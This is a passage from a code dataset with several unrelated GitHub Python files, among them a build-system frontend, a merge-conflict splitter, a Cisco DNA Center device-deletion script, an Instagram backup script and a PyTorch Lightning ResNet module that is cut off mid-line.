3","repo_name":"teichholz/aoc","sub_path":"aoc-py/2022/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37117462568","text":"import pygame as pg\nimport library as lib\n\nif __name__ == '__main__':\n pg.init()\n run = True\n point = []\n window = lib.new_window(\"Rotting point\")\n while run:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n if event.type == pg.MOUSEBUTTONDOWN:\n point = pg.mouse.get_pos()\n lib.point(window, point)\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_UP:\n point = lib.counterclockwise(point, 5)\n lib.point(window, point, lib.cts.GREEN)\n if event.key == pg.K_DOWN:\n point = lib.clockwise(point, 5)\n lib.point(window, point, lib.cts.BLUE)\n lib.flip()\n pg.quit()\n","repo_name":"AndresMpa/graphic_computing","sub_path":"clase_4_1.py","file_name":"clase_4_1.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6857165770","text":"# Build script which is intended to make the following steps smooth, painless\n# and efficient for users:\n#\n# 1) Detect environment with cmake\n# 2) Configuration step\n# 3) Build step\n# 4) Install step\n# 5) Test launch.\n#\n# Most importantly, it is intended that minimal cpu time is used to needless\n# redo work in steps 1-4 above when user changes code or configuration.\n\ndef simplebuild_main( argv = None, prevent_env_setup_msg = False ):\n\n from . import error\n error.fmt_simplebuild_warnings()#as early as possible\n from . import io as _io\n print = _io.print\n import sys\n import os\n import pathlib\n\n if argv is None:\n argv = sys.argv[:]\n\n progname = os.path.basename( argv[0] )\n\n from .parse_args import parse_args\n parser, opt = parse_args( argv = argv,\n return_parser = True )\n\n if opt.show_version:\n from . 
import _determine_version\n sys.stdout.write(_determine_version.determine_version()+'\\n')\n raise SystemExit\n\n if opt.quiet:\n _io.make_quiet()\n if opt.verbose:\n _io.make_verbose()\n\n if opt.env_setup:\n #should actually have been done in _cli.py already\n _io.make_quiet()\n from .envsetup import emit_envsetup\n emit_envsetup()\n raise SystemExit\n\n if opt.env_unsetup:\n #should actually have been done in _cli.py already\n _io.make_quiet()\n from .envsetup import emit_env_unsetup\n emit_env_unsetup()\n raise SystemExit\n\n if opt.summary:\n print(\"FIXME: summary mode is not yet implemented!\")\n raise SystemExit\n\n if opt.init is not None:\n from . import init_project\n init_project.init_project( depbundles = opt.init )\n raise SystemExit\n\n #setup lockfile:\n from . import dirs\n\n if not dirs.blddir.exists() and not dirs.installdir.exists():\n #Silently set this in case of completely fresh build, to avoid getting\n #some slightly confusing printouts later:\n opt.insist = True\n\n if opt.removelock and dirs.lockfile.exists():\n os.remove(dirs.lockfile)\n\n lockfile_content = str(os.getpid())\n if dirs.lockfile.exists():\n locking_pid = dirs.lockfile.read_text()\n error.error('Presence of lock file indicates competing invocation of '\n f'{progname} (by pid {locking_pid}). Force removal'\n f' with {progname} --removelock if you are sure this is incorrect.')\n dirs.create_bld_dir()\n dirs.lockfile.write_text(lockfile_content)\n\n assert dirs.lockfile.read_text()==lockfile_content\n\n def unlock():\n expected_content = lockfile_content\n if ( dirs.lockfile.exists()\n and dirs.lockfile.read_text()==expected_content ):\n dirs.lockfile.unlink()\n import atexit\n atexit.register(unlock)\n\n from . import conf\n from . import envcfg\n\n if opt.clean:\n if dirs.blddir.is_dir() or dirs.installdir.is_dir():\n if not opt.quiet:\n print(\"Removing temporary cache directories.\")\n conf.safe_remove_install_and_build_dir()\n #Let us perhaps also try and remove the cachedir, i.e. the parent\n #dir of install and build. We want to remove it to not litter an\n #empty \"simplebuild_cache\" in peoples bundle dirs, but we also do\n #not want to remove a directory which a user might have created\n #manually for their cache (even if empty, since it might still be\n #confusing). As a compromise, we remove it only if it is in the\n #default location with the default name (users messing with pkg_root\n #or cachedir are anyway expected to be more advanced):\n dcache = envcfg.var.build_dir_resolved.parent\n assert dcache == envcfg.var.install_dir_resolved.parent\n if ( dcache == ( envcfg.var.projects_dir / 'simplebuild_cache' )\n and not any( dcache.iterdir() ) ):\n dcache.rmdir()\n else:\n if not opt.quiet:\n print(\"Nothing to clean. Exiting.\")\n raise SystemExit\n\n #Detect changes to system cmake or python files and set opt.examine or opt.insist as appropriate.\n from . import mtime\n from . 
import utils\n systs = (mtime.mtime_cmake(),mtime.mtime_pymods())\n try:\n oldsysts = utils.pkl_load(dirs.systimestamp_cache)\n except IOError:\n if not opt.insist:\n if dirs.systimestamp_cache.exists():\n print(\"Could not load timestamp cache insist due to IOError loading dirs.systimestamp_cache\")\n opt.insist=True\n oldsysts = (None,None)\n\n if envcfg.var.allow_sys_dev:\n #prevent changes in system from triggering rebuilds (for careful system\n #development use):\n systs = oldsysts\n\n if not opt.insist and oldsysts!=systs:\n if oldsysts[0]!=systs[0]:\n opt.examine = True\n if not opt.insist and oldsysts[1]!=systs[1]:\n print(\"simple-build-system time stamp changed -> performing complete rebuild for safety.\")\n opt.insist = True\n\n if not opt.insist and dirs.envcache.exists():\n envdict=utils.pkl_load(dirs.envcache)\n #insist rebuilding COMPLETELY from scratch if install or build dirs changed:\n _autoreconf_inst_dir = envdict['_autoreconf_environment'].get('install_dir')\n _autoreconf_bld_dir = envdict['_autoreconf_environment'].get('build_dir')\n if _autoreconf_inst_dir != str(conf.install_dir()):\n print(\"Performing complete rebuild since the cache install dir changed (%s -> %s)\"%(_autoreconf_inst_dir,\n str(conf.install_dir())))\n opt.insist = True\n elif _autoreconf_bld_dir != str(conf.build_dir()):\n print(\"Performing complete rebuild since the cache build dir changed (%s -> %s)\"%(_autoreconf_bld_dir,\n str(conf.build_dir())))\n opt.insist = True\n\n if opt.insist:\n conf.safe_remove_install_and_build_dir()\n dirs.create_bld_dir()\n\n utils.pkl_dump(systs,dirs.systimestamp_cache)\n\n select_filter = envcfg.var.pkg_filter\n assert select_filter is not None\n\n from . import backend\n\n err_txt,unclean_exception = None,None\n error.default_error_type = error.Error\n try:\n pkgloader = backend.perform_configuration(select_filter=select_filter,\n force_reconf=opt.examine,\n load_all_pkgs = opt.query_mode,\n quiet=opt.quiet,\n verbose=opt.verbose)\n except KeyboardInterrupt:\n err_txt = \"Halted by user interrupt (CTRL-C)\"\n except error.CleanExit as ce:\n #errors already handled, exit directly:\n sys.exit(ce._the_ec)\n except Exception as e:\n err_txt=str(e)\n if not err_txt:\n err_txt=''\n if not isinstance(e,error.Error):\n unclean_exception = e\n except SystemExit as e:\n if str(e)!=\"knownhandledexception\":\n err_txt = \"Halted by unexpected call to system exit!\"\n unclean_exception = e\n\n error.default_error_type = SystemExit\n\n if err_txt:\n #fixme: unprefixed printouts?:\n print(\"\\n\\nERROR during configuration:\\n\\n %s\\n\\n\"\n \"Aborting.\"%(err_txt.replace('\\n','\\n ')))\n #make all packages need reconfig upon next run:\n from . import db\n db.db['pkg2timestamp']={}\n db.save_to_file()\n #exit (with ugly traceback if unknown type of exception):\n if unclean_exception:\n error.print_traceback(unclean_exception)\n sys.exit(1)\n\n assert dirs.makefiledir.is_dir()\n\n def query_pkgs():\n #returns list of (pkg,filenames) where filenames is None, or a list of\n #the files in the pkg to search (e.g. 
['pkg.info','pycpp_bla/mod.cc']\n all_pkgs = list(sorted(pkgloader.pkgs))\n if not opt.querypaths:\n return [(p,None) for p in all_pkgs]\n res=[]\n for p in all_pkgs:\n search_entire_package = False\n filenames=[]\n for qp in opt.querypaths:\n assert isinstance(p.dirname,str)#fixme: to pathlib.Path\n pdir = pathlib.Path(p.dirname)\n if pdir == qp or utils.path_is_relative_to( pdir, qp ):\n search_entire_package = True\n break\n if utils.path_is_relative_to( qp, pdir ):\n filenames.append( qp.relative_to(pdir) )\n if search_entire_package:\n res.append( (p, None) )\n elif filenames:\n res.append( (p, filenames) )\n return res\n\n if opt.grep:\n qp = query_pkgs()\n print(\"Grepping %i packages for pattern \\\"%s\\\"\"%(len(qp),opt.grep))\n print()\n n=0\n from . import grep\n for pkg,filenames in qp:\n n += grep.grep( pkg,\n opt.grep,\n filenames = filenames,\n countonly = opt.grepc )\n print()\n print(\"Found %i matches\"%n)\n raise SystemExit\n\n if opt.replace:\n qp = query_pkgs()\n pattern = opt.replace\n from . import replace\n search_pat, replace_pat = replace.decode_pattern(pattern)\n if not search_pat:\n parser.error(\"Bad syntax in replacement pattern: %s\"%pattern)\n print()\n print(\"Replacing all \\\"%s\\\" with \\\"%s\\\"\"%(search_pat,replace_pat))\n n = 0\n for pkg,filenames in qp:\n n += replace.replace( pkg,\n search_pat,\n replace_pat,\n filenames = filenames )\n print()\n print(\"Performed %i replacements\"%n)\n raise SystemExit\n\n if opt.find:\n qp = query_pkgs()\n pattern = opt.find\n from . import find\n print()\n print(\"Finding files and paths matching \\\"%s\\\"\"%(opt.find))\n print()\n n = 0\n for pkg,filenames in qp:\n n += find.find( pkg,\n pattern = opt.find,\n filenames = filenames )\n print()\n print(\"Found %i matches\"%n)\n raise SystemExit\n\n if opt.incinfo:\n import glob\n def _val_incinfofn(fn):\n if '*' in fn:\n #try to expand wildcards:\n fff = sorted(glob.glob(fn))\n if fff:\n return sum((_val_incinfofn(ff) for ff in fff),[])\n if not os.path.exists(fn):\n #Could be of form \"pkgname/subdir/file. If so, expand pkgname part\n #to full path to package:\n i=fn.split(os.path.sep)\n pkg=pkgloader.name2pkg.get(i[0],None) if len(i)==3 else None\n if pkg:\n return _val_incinfofn(dirs.pkg_dir(pkg,i[1],i[2]))\n else:\n parser.error(\"File not found: %s\"%fn)\n if os.path.isdir(fn):\n parser.error(\"Not a file: %s\"%fn)\n fn=os.path.abspath(os.path.realpath(fn))\n p = pathlib.Path(fn).absolute().resolve()\n simplebuild_pkg_dirs = [dirs.projdir, *dirs.extrapkgpath]\n if not any( utils.path_is_relative_to(p,d)\n for d in simplebuild_pkg_dirs):\n _dirsfmt=('\\n '.join(str(e) for e in simplebuild_pkg_dirs))\n parser.error(f'File {p} must be located under one of the '\n f'following directories:\\n{_dirsfmt}')\n return [fn]#expands to a single file\n from . import incinfo\n fnsraw = opt.incinfo.split(',') if ',' in opt.incinfo else [opt.incinfo]\n fns = sum((_val_incinfofn(fnraw) for fnraw in fnsraw),[])\n #remove duplicates (relies on seen.add returning None)\n seen=set()\n fns = [fn for fn in fns if not (fn in seen or seen.add(fn))]\n #Dispatch to backend:\n if len(fns)==1:\n incinfo.provide_info(pkgloader,fns[0])\n else:\n incinfo.provide_info_multifiles(pkgloader,fns)\n raise SystemExit\n\n if opt.pkginfo:\n pkg=pkgloader.name2pkg.get(opt.pkginfo,None)\n if not pkg:\n utils.err('Unknown package \"%s\"'%opt.pkginfo)\n else:\n pkg.dumpinfo(pkgloader.autodeps)\n raise SystemExit\n\n if opt.pkggraph:\n dotfile=dirs.blddir / 'pkggraph.dot'\n from . 
import dotgen\n dotgen.dotgen(pkgloader,dotfile,enabled_only=opt.pkggraph_activeonly)\n if not opt.quiet:\n print('Package dependencies in graphviz DOT format has'\n ' been generated in %s'%(dotfile))\n ec=utils.system('dot -V > /dev/null 2>&1')\n if ec:\n if not opt.quiet:\n print('Warning: command \"dot\" not found or ran into problems.')\n print('Please install graphviz to enable graphical'\n ' dependency displays')\n sys.exit(1)\n pkggraphout = dirs.blddir / 'pkggraph.png'\n import shlex\n ec=utils.system(\n 'unflatten -l3 -c7 %s|dot -Tpng -o %s'%(shlex.quote(str(dotfile)),\n shlex.quote(str(pkggraphout)))\n )\n if ec or not pkggraphout.is_file():\n if not opt.quiet:\n print('Error: Problems with dot command while transforming'\n f' {dotfile.name} to {pkggraphout.name}')\n sys.exit(1)\n else:\n if not opt.quiet:\n print('Package dependencies in PNG format has been generated'\n ' in %s'%pkggraphout)\n raise SystemExit\n\n\n if not opt.njobs:\n from . import cpudetect\n opt.njobs=cpudetect.auto_njobs()\n\n if not opt.quiet:\n print(\"Configuration completed => Launching build with %i parallel processes\"%opt.njobs)\n\n #VERBOSE:\n # -1: always quiet\n # 0: only warnings\n # 1: extra verbose printouts\n if opt.verbose:\n extramakeopts=' VERBOSE=1'\n elif opt.quiet:\n extramakeopts=' VERBOSE=-1'\n else:\n extramakeopts=''\n\n assert dirs.makefiledir.is_dir()\n ec = utils.system(f'cd {dirs.makefiledir} && '\n 'make --warn-undefined-variables -f Makefile'\n f' -j{opt.njobs}{extramakeopts}')\n if ec!=0:\n if not opt.quiet:\n print(\"ERROR: Build problems encountered\")\n sys.exit(1 if ec > 128 else ec)\n\n if not opt.quiet:\n from . import build_summary\n build_summary.produce_build_summary(\n pkgloader = pkgloader,\n verbose = opt.verbose\n )\n\n if opt.runtests:\n assert (conf.test_dir().parent / '.sbbuilddir').exists()\n import shutil\n shutil.rmtree(conf.test_dir(),ignore_errors=True)\n _testfilter=''\n if opt.testfilter:\n _testfilter=[fltr.strip() for fltr in opt.testfilter.split(',') if fltr.strip()]\n from .testlauncher import perform_tests\n ec = perform_tests( testdir = dirs.testdir,\n installdir = dirs.installdir,\n njobs = opt.njobs,\n nexcerpts = opt.nexcerpts,\n filters = _testfilter,\n do_pycoverage = False,\n pkgloader = pkgloader )\n\n from . import env\n from . import col\n cp = env.env['cmake_printinfo']\n if ec==0 and (cp['unused_vars'] or cp['other_warnings']):\n #Make sure user sees these warnings:\n print('%sWARNING%s There were warnings (see above)'%(col.bad,col.end))\n print()\n if ec:\n sys.exit(ec)\n\n if not opt.quiet:\n from .envsetup import calculate_env_setup\n needs_env_setup = bool(calculate_env_setup())\n if not prevent_env_setup_msg and needs_env_setup:\n from . import col\n print(f'{col.warnenvsetup}Build done. To use the resulting environment you must first enable it!{col.end}')\n print()\n print(f'{col.warnenvsetup}Type the following command (exactly) to do so (undo later by --env-unsetup instead):{col.end}')\n print()\n print(f' {col.warnenvsetup}eval \"$({progname} --env-setup)\"{col.end}')\n print()\n else:\n print(\"Build done. 
You are all set to begin using the software!\")\n print()\n if not needs_env_setup:\n print(f'To see available applications, type \"{conf.runnable_prefix}\" and hit the TAB key twice.')\n print()\n","repo_name":"mctools/simplebuild","sub_path":"src/_simple_build_system/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":17053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7796048487","text":"#again rerun\nimport os\nimport re\ndef run(arguments):\n needsspace_re = re.compile(r'(\\w[):;\"-\\.,!}]*) +([^%}~])')\n allmarkers_re = re.compile(r'(.*?)%(\\[ORIG|ORIG\\]\\[NEW|NEW\\])%(.*\\n*)')# in all these, the newline at the end is just so it doesn't gobble up the newline\n def parse_line(orig_log_text,new_log_text,log_in_orig,log_in_new,text_to_parse):\n match = allmarkers_re.match(text_to_parse)\n if match:\n textone,typeofmarker,texttwo = match.groups()\n if typeofmarker == 'NEW]':\n print(\"found a matching line, current status is (\",log_in_orig,',',log_in_new,\")\")\n if log_in_new and not log_in_orig:\n switchto = (True,True)# log in orig, log in new\n print(\"in text:\\n\",text_to_parse,\"\\n--> encountered an end marker, switching to\",switchto)\n else:\n raise ValueError(\"I encountered an %NEW]% marker, but I was not leaving orig along and logging only in new (False,True), but rather \"+repr(log_in_orig)+','+repr(log_in_new)+\":\\n\"+text_to_parse)\n elif typeofmarker == 'ORIG][NEW':\n print(\"found a matching line, current status is (\",log_in_orig,',',log_in_new,\")\")\n if log_in_orig and not log_in_new:\n switchto = (False,True)# log in orig, log in new\n print(\"in text:\\n\",text_to_parse,\"\\n--> encountered a middle marker, switching to\",switchto)\n else:\n raise ValueError(\"I encountered an %ORIG][NEW% marker, but I was not logging in orig but not in new, but rather \"+repr(log_in_orig)+','+repr(log_in_new),\":\\n\",text_to_parse)\n elif typeofmarker == '[ORIG':\n print(\"found a matching line, current status is (\",log_in_orig,',',log_in_new,\")\")\n if log_in_new and log_in_orig:\n switchto = (True,False)# log in orig, log in new\n print(\"in text:\\n\",text_to_parse,\"\\n--> encountered an %[ORIG% marker, switching to\",switchto)\n else:\n raise ValueError(\"I encountered an %[ORIG% marker, but I was not logging in both orig and new, but rather\"+repr(log_in_orig)+','+repr(log_in_new)+\":\\n\"+text_to_parse)\n else:\n textone = text_to_parse\n texttwo = None\n #}}} check to see if I have a separator\n # regardless, dump the first group into the current bin \n if log_in_orig:\n orig_log_text += textone\n if log_in_new:\n new_log_text += textone\n if match:\n log_in_orig,log_in_new = switchto\n print(\"yes, I am actually switching the binning\")\n print(\"so that status is (\",log_in_orig,',',log_in_new,\")\")\n # if there is a second group (if I have a separator), change which bin I'm in, and add to the end of the current line!\n if texttwo is not None:\n orig_log_text,new_log_text,log_in_orig,log_in_new = parse_line(orig_log_text,new_log_text,log_in_orig,log_in_new,texttwo)\n return orig_log_text,new_log_text,log_in_orig,log_in_new\n fp = open(arguments[0],'r')\n text_list = []\n print('opened',arguments[0])\n log_in_orig = True\n log_in_new = True\n head_title = None\n new_title = None\n #{{{ pull out just the part between the document text\n orig_textlist = []\n new_textlist = []\n j = 0\n for thisline in fp:\n if j == 0:\n if thisline[:12] == '%ONEWORDDIFF':\n print(\"found 
%ONEWORDDIFF marker, title is:\")\n head_title = 'HEAD\\n'\n new_title = thisline[14:]\n print(new_title)\n this_is_a_onewordfile = True\n else:\n this_is_a_onewordfile = False\n if this_is_a_onewordfile:\n print(\"I found this to be a oneword format file\")\n else:\n print(\"I did not find this to be a oneword format file\")\n if this_is_a_onewordfile:# this is only stored if it's a onewordfile\n #new processing for oneworddiff\n #{{{ check to see if I have a separator, and set switchto, to show where I switch\n orig_log_text,new_log_text,log_in_orig,log_in_new = parse_line('','',log_in_orig,log_in_new,thisline)\n if len(orig_log_text) > 0:\n orig_textlist.append(orig_log_text)\n if len(new_log_text) > 0:\n new_textlist.append(new_log_text)\n else:\n #standard processing\n if thisline[-11:] == '%FIRSTSET%\\n': # if the first set, treat like it's not a comment\n if log_in_orig:\n orig_textlist.append(thisline)\n if log_in_new:\n new_textlist.append(thisline)\n else:\n if (thisline[:7] == '<<<<<<<'):\n log_in_orig = True\n log_in_new = False\n if (head_title is None): # for the first marker, store the title\n head_title = thisline[7:]\n elif thisline[7:] == head_title:\n pass\n else:\n raise ValueError(\"I don't understand line %d, which seems to give an inconsistent head title. It gave:\\n%s\\nvs expected:\\n%s\"%(j,thisline[7:],head_title))\n elif (thisline[:7] == '>>>>>>>'):\n log_in_orig = True\n log_in_new = True\n if (new_title is None): # for the first marker, store the title\n new_title = thisline[7:]\n elif thisline[7:] == new_title:\n pass\n else:\n raise ValueError(\"I don't understand line %d, which seems to give an inconsistent new title. It gave:\\n%s\\nvs expected:\\n%s\"%(j,thisline[7:],new_title))\n elif (thisline[:7] == '======='):\n log_in_orig = False\n log_in_new = True\n else:\n if log_in_orig:\n orig_textlist.append(thisline)\n if log_in_new:\n new_textlist.append(thisline)\n j+=1\n if this_is_a_onewordfile:\n print(\"I found this to be a oneword format file\")\n else:\n print(\"I did not find this to be a oneword format file\")\n fp.close()\n #{{{ write out the result\n newfile = re.sub(r\"(.*)\",r'\\1.merge_new',arguments[0]) \n fp = open(newfile,'w')\n new_textlist = ['#%%%%%BRANCH TITLE (This side is saved): '+new_title] + new_textlist\n fp.write(''.join(new_textlist))\n fp.close()\n newfile = re.sub(r\"(.*)\",r'\\1.merge_head',arguments[0]) \n fp = open(newfile,'w')\n orig_textlist = ['#%%%%%BRANCH TITLE: '+head_title] + orig_textlist\n fp.write(''.join(orig_textlist))\n fp.close()\n #}}}\n","repo_name":"jmfranck/pyDiffTools","sub_path":"pydifftools/split_conflict.py","file_name":"split_conflict.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1107619035","text":"def selectionSort(arr, N) :\n for i in range(N-1) :\n minIdx = i\n for j in range(i+1, N) :\n if arr[minIdx] > arr[j] :\n minIdx = j\n print(f'가장 작은 값 : {minIdx}')\n print(f'현재 가장 왼쪽 idx : {i}')\n arr[i], arr[minIdx] = arr[minIdx], arr[i]\n print('='*30)\n print()\n print(arr)\n\narr = [8, 10, 53, 2, 16, 9, 42, 22]\nN = len(arr)\nprint(arr)\nselectionSort(arr, N)\n","repo_name":"RoraKim/Homework","sub_path":"3_algorithm_hws/0214/0214_prof/selection_sort/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7408099199","text":"#!/usr/bin/env 
python\n\n\"\"\"\nAuthor: Nick Russo\nPurpose: Demonstrate Python \"requests\" to delete an existing\ndevice from Cisco DNA Center using the REST API.\n\"\"\"\n\nimport time\nimport requests\nfrom auth_token import get_token\n\n\ndef main():\n \"\"\"\n Execution begins here.\n \"\"\"\n\n # Reuse the get_token() function from before. If it fails\n # allow exception to crash program\n token = get_token()\n\n # Declare useful local variables to simplify request process\n api_path = \"https://sandboxdnac.cisco.com/dna\"\n headers = {\"Content-Type\": \"application/json\", \"X-Auth-Token\": token}\n\n # Issue an HTTP GET to search for a specific device by IP address\n delete_ip = \"192.0.2.1\"\n get_resp = requests.get(\n f\"{api_path}/intent/api/v1/network-device/ip-address/{delete_ip}\",\n headers=headers,\n )\n\n # If the device was found, continue with deletion\n if get_resp.ok:\n delete_id = get_resp.json()[\"response\"][\"id\"]\n print(f\"Found device with mgmt IP {delete_ip} and ID {delete_id}\")\n\n # Issue HTTP DELETE and specify the device ID. Like the HTTP POST\n # to add a device, this is an asynchronous operation\n delete_resp = requests.delete(\n f\"{api_path}/intent/api/v1/network-device/{delete_id}\",\n headers=headers,\n )\n\n # If delete succeeded, check task ID for completion\n if delete_resp.ok:\n\n # Wait 10 seconds after server responds\n print(f\"Request accepted: status code {delete_resp.status_code}\")\n time.sleep(10)\n\n # Query DNA center for the status of the specific task ID\n task = delete_resp.json()[\"response\"][\"taskId\"]\n task_resp = requests.get(\n f\"{api_path}/intent/api/v1/task/{task}\", headers=headers\n )\n\n # See if the task was completed successfully or not\n if task_resp.ok:\n task_data = task_resp.json()[\"response\"]\n if not task_data[\"isError\"]:\n print(\"Old device successfully deleted\")\n else:\n print(f\"Async task error seen: {task_data['progress']}\")\n else:\n print(f\"Async GET failed: status code {task_resp.status_code}\")\n\n else:\n # The initial HTTP DELETE failed; print details\n print(f\"Device removal failed with code {delete_resp.status_code}\")\n print(f\"Failure body: {delete_resp.text}\")\n\n else:\n print(f\"Could not find device with mgmt IP {delete_ip}\")\n print(f\"Code: {get_resp.status_code} Body: {get_resp.text}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nickrusso42518/pluralsight","sub_path":"devasc1/m6/delete_device.py","file_name":"delete_device.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"23135910493","text":"from datetime import datetime\r\nimport subprocess\r\nimport requests\r\nimport random\r\nimport time\r\nimport os\r\n\r\n\r\n#Constants #TODO:Config file\r\nabsolute_path = os.path.dirname(__file__)\r\n\r\nlog_path = f\"{absolute_path}/instagram.backup.log\"\r\naccount_file = f\"{absolute_path}/accounts/ActiveAccounts.txt\"\r\ninactive_account_file = f\"{absolute_path}/accounts/InactiveAccounts.txt\"\r\ninstaloader_params = \"--latest-stamps --login=YOUR USERNAME --stories --highlights --tagged --igtv --comments --geotags --igtv\" #TODO:unhardcode\r\nbackup_folder = f\"{absolute_path}/instagram.backup\"\r\nntfy_level = \"full\"\r\n\r\n#Variables\r\nlog_filename = f\"{log_path}/{datetime.now().strftime('%d-%m-%y %H:%M:%S')}.log\"\r\nprocessed_account = 0\r\n\r\ndef main():\r\n initialize()\r\n for acc in account_list:\r\n download_profile(acc)\r\n show_status(processed_account, 
account_list)\r\n        do_sleep()\r\n    finalize()\r\n\r\ndef initialize():\r\n    global account_list\r\n    global inactive_account_list\r\n    global starting_time \r\n    \r\n    os.chdir(backup_folder)\r\n    to_log(f\"{current_time()} Backup Started\")\r\n    account_list, inactive_account_list = import_account()\r\n    starting_time = current_time()\r\n    to_log(f\"Archiving: {len(account_list)} Accounts\")\r\n    to_log(f\"No longer Archiving: {len(inactive_account_list)} Accounts\")\r\n    to_log(\"============================================\") \r\n    message = {\r\n        \"Title\": f\"[{starting_time}] Instagram Backup started.\",\r\n        \"Content\": f\"Archiving: {len(account_list)} Accounts. No longer archiving: {len(inactive_account_list)} Accounts.\"\r\n    }\r\n    ntfy(message)\r\n    \r\ndef import_account():\r\n    try:\r\n        with open(account_file, \"r\") as file:\r\n            account_list = file.read().splitlines()\r\n        with open(inactive_account_file, \"r\") as file:\r\n            inactive_account_list = file.read().splitlines()\r\n        return account_list, inactive_account_list\r\n    except IOError:\r\n        to_log(\"[ERROR]: Failed to import accounts\")\r\n        exit(1)\r\n    \r\ndef download_profile(username):\r\n    try:\r\n        to_log(f\"[{current_time()}] Processing Account: {username}\")\r\n        command = f\"instaloader {instaloader_params} {username}\" # the executable name was missing from the command string; assumes the instaloader CLI is on PATH\r\n        process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #TODO:Change to Python\r\n        output, error = process.communicate() #\r\n        to_log(output.decode('utf-8')) #\r\n        print(f\"Profile '{username}' downloaded successfully.\")\r\n    except Exception as e:\r\n        print(f\"Error downloading profile '{username}': {e}\")\r\n    \r\ndef show_status(processed_account, account_list):\r\n    progress = f\"{processed_account}/{len(account_list)}\"\r\n    percentage = f\"{(processed_account / len(account_list)) * 100:.2f}%\"\r\n    to_log(f\"Progress: {progress} | {percentage}\")\r\n\r\ndef do_sleep():\r\n    sleep_time = min(random.expovariate(0.6), 15.0)\r\n    to_log(f\"Sleeping {sleep_time} Seconds...\")\r\n    to_log(\"============================================\")\r\n    time.sleep(sleep_time)\r\n\r\ndef finalize():\r\n    ending_time = current_time()\r\n    if ntfy_level == \"full\": # compare the level constant, not the ntfy function #TODO:More notification options\r\n        notification_data = {\r\n            \"Title\": f\"{ending_time} Instagram Backup finished.\",\r\n            \"Content\": \"Backup finished\"\r\n        }\r\n        ntfy(notification_data)\r\n    to_log(f\"[{ending_time}] Backup finished.\")\r\n    \r\ndef ntfy(data):\r\n    url = \"https://ntfy.sh/InstaLoader1101\"\r\n    headers = { \"Title\": data[\"Title\"] } # Ugly, but any change here breaks the code\r\n    requests.post(url, headers=headers, data=data[\"Content\"])\r\n    \r\ndef to_log(entry):\r\n    with open(log_filename, \"a\") as log_file:\r\n        log_file.write(f\"{entry}\\n\")\r\n    \r\ndef current_time():\r\n    return datetime.now().strftime('%d-%m-%y %H:%M:%S')\r\n\r\nmain()","repo_name":"Wirezat/InstagramBackup","sub_path":"instagram_backup.py","file_name":"instagram_backup.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3965259834","text":"import pytorch_lightning as pl\nimport torch\nimport torchvision\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchmetrics import F1Score, AUROC\nfrom torchmetrics.classification import MulticlassAccuracy, BinaryAccuracy, MulticlassPrecision\n\n\nclass ResNet(pl.LightningModule):\n\n    def __init__(self, classes, lr, weight_decay, metric=\"accuracy\", max_epochs=100):\n        \"\"\"\n\n        :param classes 
(tuple(str, int)): list of tuples, each tuple consists of class name and class index\n        :param lr (float): learning rate\n        :param weight_decay (float): weight decay of optimizer\n        :param max_epochs (int): maximum epochs\n        :param metric (str): specifies the type of metric\n        \"\"\"\n        super().__init__()\n        self.save_hyperparameters()\n        self.model = torchvision.models.resnet18(num_classes=len(self.hparams.classes))\n        self.train_ac = MulticlassAccuracy(num_classes=len(self.hparams.classes), average=None)\n        self.val_ac = MulticlassAccuracy(num_classes=len(self.hparams.classes), average=None)\n        self.test_ac = MulticlassAccuracy(num_classes=len(self.hparams.classes), average=None)\n\n        self.train_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n        self.val_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n        self.test_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n\n        task = \"binary\" if len(self.hparams.classes) == 2 else \"multiclass\"\n        self.train_f1 = F1Score(task=task, num_classes=len(self.hparams.classes))\n        self.val_f1 = F1Score(task=task, num_classes=len(self.hparams.classes))\n        self.test_f1 = F1Score(task=task, num_classes=len(self.hparams.classes))\n\n        self.train_auc = AUROC(task=task, num_classes=len(self.hparams.classes))\n        self.val_auc = AUROC(task=task, num_classes=len(self.hparams.classes))\n        self.test_auc = AUROC(task=task, num_classes=len(self.hparams.classes))\n\n        self.metrics = {\"train\": [self.train_ac, self.train_p, self.train_f1,\n                                  # self.train_auc\n                                  ],\n                        \"val\": [self.val_ac, self.val_p, self.val_f1,\n                                # self.val_auc\n                                ],\n                        \"test\": [self.test_ac, self.test_p, self.test_f1,\n                                 # self.test_auc\n                                 ]\n                        }\n\n    def configure_optimizers(self):\n        optimizer = optim.AdamW(self.parameters(),\n                                lr=self.hparams.lr,\n                                weight_decay=self.hparams.weight_decay)\n        lr_scheduler = optim.lr_scheduler.MultiStepLR(optimizer,\n                                                      milestones=[int(self.hparams.max_epochs * 0.7),\n                                                                  int(self.hparams.max_epochs * 0.9)],\n                                                      gamma=0.1)\n        return [optimizer], [lr_scheduler]\n\n    def _calculate_loss(self, batch):\n        imgs, labels = batch[\"img\"], batch[\"label\"]\n        preds = self.model(imgs)\n        loss = F.cross_entropy(preds, labels)\n        return {\"loss\": loss, \"preds\": torch.flatten(preds.argmax(dim=-1)), \"labels\": torch.flatten(labels)}\n\n    def training_step(self, batch, batch_idx):\n        return self._calculate_loss(batch)\n\n    def training_step_end(self, batch_parts):\n        preds = 